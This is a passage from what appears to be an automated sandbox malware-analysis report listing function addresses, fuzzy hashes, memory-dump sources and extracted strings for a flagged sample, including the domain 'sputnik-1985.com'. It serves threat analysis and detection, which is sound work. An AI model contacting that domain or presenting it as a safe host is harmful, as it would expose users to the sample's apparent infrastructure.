                                                                                                                                                                                                                                        • Instruction ID: 993707e29881803d9eeff06886ba90ad4faafeb075afa3bf8289254efe38a485
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40A149726843109BD725CF28CCC1B7BB7A7EBC5728F19862DE59867294D7319801CBD1
                                                                                                                                                                                                                                        Function 0043C5A0 Relevance: 1.6, Strings: 1, Instructions: 385COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: NP,?
                                                                                                                                                                                                                                        • API String ID: 0-3110377521
                                                                                                                                                                                                                                        • Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                                                                                                                                                                                        • Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
                                                                                                                                                                                                                                        Function 0211C148 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ''
                                                                                                                                                                                                                                        • API String ID: 0-694448769
                                                                                                                                                                                                                                        • Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                                                                                                                                                        • Instruction ID: 3883b6cc8dcef48c76b85bebe2a1d7b4bfb12ab289dbd19937482fd30b24428d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A39110B16983108BC314CF28C89166BB7E2EFC1364F189A2DE8D68B790E778C505C797
                                                                                                                                                                                                                                        Function 0041BEE1 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ''
                                                                                                                                                                                                                                        • API String ID: 0-694448769
                                                                                                                                                                                                                                        • Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                                                                                                                                                        • Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
                                                                                                                                                                                                                                        Function 00416ED0 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *+
                                                                                                                                                                                                                                        • API String ID: 0-2181965719
                                                                                                                                                                                                                                        • Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                                                                                                                                                        • Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
                                                                                                                                                                                                                                        Function 021426D7 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: _\]R
                                                                                                                                                                                                                                        • API String ID: 0-1576797437
                                                                                                                                                                                                                                        • Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                                                                                                                                                        • Instruction ID: 423a7ca2f62ec043ce47bbd2c4737e90bf8997a8b7dc59a4ed136a52272c5c1e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 799128316483529BC718DF28C850A6FB7E2EFD9324F19856CF9C997291EB31D841CB86
                                                                                                                                                                                                                                        Function 00442470 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: _\]R
                                                                                                                                                                                                                                        • API String ID: 2994545307-1576797437
                                                                                                                                                                                                                                        • Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                                                                                                                                                                                        • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                                                                                                                                                                                        Function 02128197 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 0-3019521637
                                                                                                                                                                                                                                        • Opcode ID: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
                                                                                                                                                                                                                                        • Instruction ID: 44892d0f856a689a37bbf21d6997815d0246af92606d078c65545a335e670424
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94814AB1A883205BD7149F648CD1B2F73A6EFC1314F1A863CF8954B281E735D819C7A5
                                                                                                                                                                                                                                        Function 02106267 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                        • Opcode ID: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                                                                                                                                                                                        • Instruction ID: f81f718cea34ff01307e1637895fdcedf0664efaeae007c94692e942105a2583
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88B138712083819FD324CF58C89465BFBE4AFA9204F448A2DF5D997382D771EA18CB97
                                                                                                                                                                                                                                        Function 00406000 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                        • Opcode ID: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                                                                                                                                                                                        • Instruction ID: 01c58491163616012ee55187fd92943d7eb5500c339a617f16e03986bf466463
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86B138711093819FD321CF18C88065BFBE0AFA9304F444A2DF5DA97782D675EA18CBA6
                                                                                                                                                                                                                                        Function 02133B97 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                        • Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                                                                                                                                                                                        • Instruction ID: fae630b8e427c4637ac50e37632e286b503d438759fe9f5fc43af62aa089000e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE813836799A904BD72D9A3C4C212BA7A930BD6130F2DC7BDB5F68B3E1D65988058384
                                                                                                                                                                                                                                        Function 00433930 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                        • Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                                                                                                                                                                                        • Instruction ID: ef403fb1259512c9711d70f2e7d5f4cfd006a755ed026aeb3bab0d0ce1423d2c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49816827759AD04BD7289E3C4C6127ABE830BD6230F2DD77EB5F68B3E2D56889018345
                                                                                                                                                                                                                                        Function 0212DA97 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                        • Instruction ID: b68b8ee6eb1f2a40f800c4263b7cabbb4edcd2fabbd5b452baf09f5c928b4adb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D71E132A483694BD7248E28E89031EB7E2EBC6714F19D52DF4949B391D375DC6CCB82
                                                                                                                                                                                                                                        Function 0042D830 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                        • Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A
                                                                                                                                                                                                                                        Function 0210D253 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • 43A2C7AD89C30672D0632DF0E28DC412, xrefs: 0210D3D2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 43A2C7AD89C30672D0632DF0E28DC412
                                                                                                                                                                                                                                        • API String ID: 0-3398323051
                                                                                                                                                                                                                                        • Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                                                                                                                                                                                        • Instruction ID: 20940e6479b7d676e70b7ec323de74bf83c0b40b011da2f9311adc7217aeab7e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A515A726457008FD329CF38CCC2AA67BA3EFD6314B1D866CC5964B796DB79A006CB50
                                                                                                                                                                                                                                        Function 0211AB67 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: _;=8
                                                                                                                                                                                                                                        • API String ID: 0-3640539833
                                                                                                                                                                                                                                        • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                                                                                                                                                        • Instruction ID: 444e3a20757e40161321b7d149714b1cf4b28fe595423ac9573433922ff3365f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C51EFB0511B408BC7389F25C8617B7BBF1EF42349B084E6DC5C38BA45E739A509CBA1
                                                                                                                                                                                                                                        Function 0041A900 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: _;=8
                                                                                                                                                                                                                                        • API String ID: 0-3640539833
                                                                                                                                                                                                                                        • Opcode ID: 761fee75f665dfa1eaae6b06a030ceb1e4930ac75bffb75f1212cbb352e39214
                                                                                                                                                                                                                                        • Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 761fee75f665dfa1eaae6b06a030ceb1e4930ac75bffb75f1212cbb352e39214
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5
                                                                                                                                                                                                                                        Function 02117137 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *+
                                                                                                                                                                                                                                        • API String ID: 0-2181965719
                                                                                                                                                                                                                                        • Opcode ID: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                                                                                                                                                                                        • Instruction ID: 3e6b2c37756b795338a32a0e5b6c8f60277c8445bb85ae85ea34af1dfdc4dc72
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4612FB144A3818BD371CF2588917DBFBE2AF96318F14892CD5C89B294EB384146CB87
                                                                                                                                                                                                                                        Function 02140E12 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: }I\
                                                                                                                                                                                                                                        • API String ID: 0-3759065986
                                                                                                                                                                                                                                        • Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                                        • Instruction ID: 8d8a9ec3e315515b55e14745e5f4a637f183bb5fe625cb81f23eee33c11acab2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A31BE705646928BDB15CF35C891BB6BBF0FF4B214B144758C8C59B681EB38A592CB81
                                                                                                                                                                                                                                        Function 00440BAB Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: }I\
                                                                                                                                                                                                                                        • API String ID: 0-3759065986
                                                                                                                                                                                                                                        • Opcode ID: e3c383380369b29b5d77e71a9769f4c1954532aface20423e04adb5d790b1dad
                                                                                                                                                                                                                                        • Instruction ID: 06326f033c1d303d2a0c44ae50e6a95f42fac71f38a9198839615570ed5a6674
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3c383380369b29b5d77e71a9769f4c1954532aface20423e04adb5d790b1dad
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 653126605546928BEB258F34C8A27B7BBB0FF47310F144759C8C18B785EB78A992CB85
                                                                                                                                                                                                                                        Function 02116D15 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 0-3019521637
                                                                                                                                                                                                                                        • Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                                        • Instruction ID: 3f1642500e12c12ff3ae07f1c382a8e5721c1c3e8449d2afaedcfb88bb3465ec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A110471358290AFD7648F24CD8677B73EAABC2324F28863CD1D8872D1DB36D4408B05
                                                                                                                                                                                                                                        Function 0210A070 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: sputnik-1985.com
                                                                                                                                                                                                                                        • API String ID: 0-2531595869
                                                                                                                                                                                                                                        • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                        • Instruction ID: 59533f2f378063958e70d4a58184ec0d41dfbea96c54f316e02d4ee63dc24258
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91E0DF389102498FC704CF58C8A2A77B7B0EF0B304F14A469DA83EB360E3789905C7AC
                                                                                                                                                                                                                                        Function 00409E09 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
